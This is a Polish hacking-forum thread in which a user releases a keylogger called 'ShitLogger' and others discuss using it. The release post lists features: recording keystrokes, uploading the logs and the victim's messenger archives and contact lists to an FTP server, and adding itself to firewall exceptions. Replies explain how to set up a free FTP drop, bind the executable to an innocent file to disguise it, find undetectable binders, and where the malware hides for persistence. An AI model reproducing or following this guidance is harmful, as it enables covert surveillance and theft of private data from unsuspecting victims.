ShitLogger

[amex]

[center:ab3eb90676]OPIS[/center:ab3eb90676]
Funkcje keyloggera:
- przychwytywanie wciśniętych klawiszy (zaskakujące, prawda?)
- wysyłanie logów na serwer ftp
- wysyłanie plików config.dat, archives.dat i smsead.dat na serwer ftp
- dodawanie się do wyjątków systemowego firewalla

Co rozróźnia ShitLogger od innych?
- dodawanie do wyjątków firewalla
- wysyłanie m.in. archiwum gg
- wyjątkowo brzydki konfigurator xD
- na początku każdego loga jest konfiguracja IP, nazwa usera XP oraz data i godzina.

Standardowe pytania:


Pyt:Dlaczego archives.dat jest uszkodzony?
Odp:Plik archives,dat nie jest uszkodzony, tylko nie pełny, co wynika z ograniczeń serwera ftp lub z łącza ofiary, spowodowało to wysłanie jedynie części pliku.

Pyt:Dlaczego keylogger nie wysyła logów?
Odp:Prawdopodobnie ofiara ma inny FireWall niż systemowy, lub źle skonfigurowałeś/łaś keyloggera

Pyt:Dlaczego keylogger nie wysyła plików gg?
Odp:Ofiara korzystać może np z AQQ co uniemożliwia wysłanie plików.


Inne uwagi:

nazwa pliku z logami:
- przy włączonej opcji ładowania przy starcie "logi(losowaLiczba).txt"
- przy wyłączonej opcji ładowania przy starcie "logi(losowaLiczba)_data_godzina.txt
gdzie:
(losowaLiczba)-stała liczba wybierana przy pierwszym odpaleniu programu;
data_godzina-data o godzina o formacie dd_mmmmmm_rrrr_hh_mm
d-dzien
m-miesiac
r-rok
h-godzina
m-minuta

Przy włączonej opcji ładowania pliku przy starcie jak i wysyłania pliku archives.dat wystąpić mogą błędy spowodowane limitem rozmiaru jednego pliku na serwerze FTP.

Plik archives.dat jest wysyłany tylko podczas pierwszego uruchonienia programy,za bardzo zamula on bowiem keyloggera aby mógł być wysyłany przy każdym starcie...

[center:ab3eb90676]wykrywalność 0%:[/center:ab3eb90676]

download

 

[Wojtek]

No to testujemy

Wszystko pięknie działa

( testowane na yoyo.pl )

Zaraz posypią sie pytania jak usunąć:

Kopiuje się do:

C:WINDOWSsvchost.exe

HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun

ABCDEFGH.exe

Więc:

CTRL + ALT + DLT
(wywalamy z procesów)

Start >> uruchom >> msconfig >> odznaczamy svchost
(wywalamy z autostartu)

Porty których używa ShitLoger:
•2984
•2985

Logi +config.dat+ archiwes.dat + lista kontaktów kopiują się do :

C:Windows

po czym są wysyłane na FTP i usuwane.

 

[Dark Smark]

Wygląda bardzo ciekawie, szczególnie że ma opcje wysyłania (jak złodziej) archiwum i config i listy kontaktów. Dobrze że przy zapisywaniu logów dałeś losowa liczba bo zawsze jest prawdopodobieństwo że ktoś ma taka sama nazwa usera i w tym samym czasie wyśle...
:hahaha:
Może użyj gimpa bo można w nim nawet ładną grafikę zrobić...

Czemu nie dodasz serwera do zasobu konfiguratora?
Niech wyrzuci z siebie serwer i wtedy skonfiguruje. Bo ludzie będą głupie zadawać pytania co zrobić z serwer, co wysłać...

Szkoda że na bazie KeySpyXP i IdFTP myślałem że jakieś bardziej nowatorskie rozwiązanie będzie ;D

Wykrywalność prezentuje się trochę inaczej, nie dystrybuowałem pliku by nie zwiększać wykrywalnośći

 

[0wn3r]

No, no, no... muszę przyznać, niezły keylogger

Tylko szkoda, że na komponencie KeySpy, jeśli byś założył hook'a globalnego, było by lepiej..

 

[gabcio]

a ja chcialem najpierw przetestowac na sobie i wyszedl mi taki blad jak chcialem odpalic serwer Socker error#11004
niby w procesach jest ale nic mi nie przesyla na ftp...
wie moze ktos co jest nie tak???

 

[amex]

Originally posted by Dark Smark
Wykrywalność prezentuje się trochę inaczej, nie dystrybuowałem pliku by nie zwiększać wykrywalnośći

hmmm.... no nie wiem jak to tak... no cóż, inny skaner...

Originally posted by 0wn3r+--><div class='quotetop'>CYTAT(0wn3r)</div>

Tylko szkoda, że na komponencie KeySpy, jeśli byś założył hook'a globalnego, było by lepiej..[/b]

tak, miałem taki zamiar, jednak czas mnie pogania, jestem w domu tylko na weekend, hooka globalnego nigdy nie robiłem więc miałbym zapewne kilka problemów a że chciałem go skończyć do niedzieli...

W przyszły tydzień mam zamiar wywalić tego KeySpy i dać hooka, jednak nic nie obiecuje...


<!--QuoteBegin-gabcio
a ja chcialem najpierw przetestowac na sobie i wyszedl mi taki blad jak chcialem odpalic serwer Socker error#11004
niby w procesach jest ale nic mi nie przesyla na ftp...

hmmm... jaki serwer i co wpisujesz w konfiguratorze? na 99% błąd występuje z powodu złej konfiguracji...

//DOWN: z samym hookiem nie mam problemów, ale nie omieszkam się odezwać xD

 

[0wn3r]

amex, jak byś miał problem z założeniem hook'a, to pisz do mnie

 

[faction12]

witam mam pytanie jak zrobic zeby shitlogger dzialal poprawnie konfiguruje ftp wybieram plik np. zdiecie daje koniguruj pisze ze wszytko ok ale z tym zdieciem nic sie nie zmienilo i drugie jak chce wyslac ofiarze to te zdiecie czy plik prosze odpisz mi bardzo to dlamnie wazne daj mala instrukcje iak dalej postepowac.Cos chyba mi nie dziala

dodam ze ftp yoyo

 

[Zergi]

A ja mam pytanie w czym był pisany ShitLogger? Domyślam się, że chyba w delphi

pozdro

 

[abramakabra]

Originally posted by Zergi
A ja mam pytanie w czym był pisany ShitLogger? Domyślam się, że chyba w delphi

Tak.

 

[faction12]

juz sobie poradzilem

 

[Wojtek]

Originally posted by faction12
witam mam pytanie jak zrobic zeby shitlogger dzialal poprawnie konfiguruje ftp wybieram plik np. zdiecie

Podajesz ścieżkę do serwera ... a nie do zdjęcia ... czy czego kolwiek innego.
Potem możesz zbindować sobie serwer.exe z jakimś plikiem i zmienić nazwę ...


[center:a435acac92]--------------------------------------------------------------------------------------------[/center:a435acac92]
Jak założyć konto na yoyo.pl : (będzie nam potrzebne ;P :hahaha: )
http://www.bastionfantasy.pl/forum/viewtopic.php?t=28

Konfigutacja FTP w ShitLoggerze :
Host Serwera:
cos.yoyo.pl

Nazwa użytkownika:
cos.yoyo.pl (na yoyo.pl zawsze taka sama jak HOST)

Hasło:
Takie jakie podaliśmy wcześniej
[center:a435acac92]--------------------------------------------------------------------------------------------[/center:a435acac92]

 

[faction12]

możesz zbindować sobie serwer.exe z jakimś plikiem i zmienić nazwę ...


jak to zrobic prosze o jakis dobry nie wykrywalny program

 

[Wojtek]

Originally posted by faction12
nie wykrywalny program

Możesz dalej prosić ... :hahaha: albo samemu coś napisać ... :nauka:


Ja polecam Ci to:
http://www.haker.com.pl/forum/viewtopic.ph...514&start=0 //wersja demo

Więcej tutaj:
http://www.haker.com.pl/forum/viewtopic.php?t=27609

 

[faction12]

zajzalem tam ale tam sa wykrywalne zobacze tego z wersja demo :faja:

 

[paradys]

wszystko pieknie,ladnie. pliki sie wysylaja,logi tez,tyle tylko ze windowsowy firewall go blokuje ja mam XP z SP2 i on sie rzuca:/ tzn przy probie pierwszego uruchomienia,za drugim razem juz nie ma zadnych obiekcji mozna to jakos "naprawic"?

 

[akselekbezelek]

Originally posted by paradys
wszystko pieknie,ladnie. pliki sie wysylaja,logi tez,tyle tylko ze windowsowy firewall go blokuje ja mam XP z SP2 i on sie rzuca:/ tzn przy probie pierwszego uruchomienia,za drugim razem juz nie ma zadnych obiekcji mozna to jakos "naprawic"?

ponowny wyslka pliku lu masz programie ftp jak co to exploit i back door ;d

 

[Barlto]

Mam n00bowskie pytanie tam gdzie trzeba wpisac serwer FTP to co tam trzeba zrobic ?;p
Jak ktos moglby mi tak troche wytlumaczyc ;p

 

[Dark Smark]

Originally posted by Barlto
Mam n00bowskie pytanie tam gdzie trzeba wpisac serwer FTP to co tam trzeba zrobic ?;p
Jak ktos moglby mi tak troche wytlumaczyc ;p

http://pl.wikipedia.org/wiki/FTP
Załóż na darmowym hostingu.
http://www.yoyo.pl/

Parametry do konta uzyskasz jak utworzysz stronę w odpowiedniej zakładce w panelu administracyjnym na yoyo.

 

[Patrykos91]

Bardzo dobry keyloggerek , już nawet sam się nim shakowałem xD

Potrzebny jest do niego tylko jakiś dobry binder i można wymiatać

)

Mam jeszcze tylko pytanie .. Czy nie dało by rady dodać opcji auto usuwania serwera z komputera ofiary np. po jakimś czasie.

Aha .. no i jak mam to teraz usunąć od siebie ;> .. znalazlem pliczek w C:windows/system32/serwer.exe .. wywaliłem svchost z msconfig , coś jeszcze?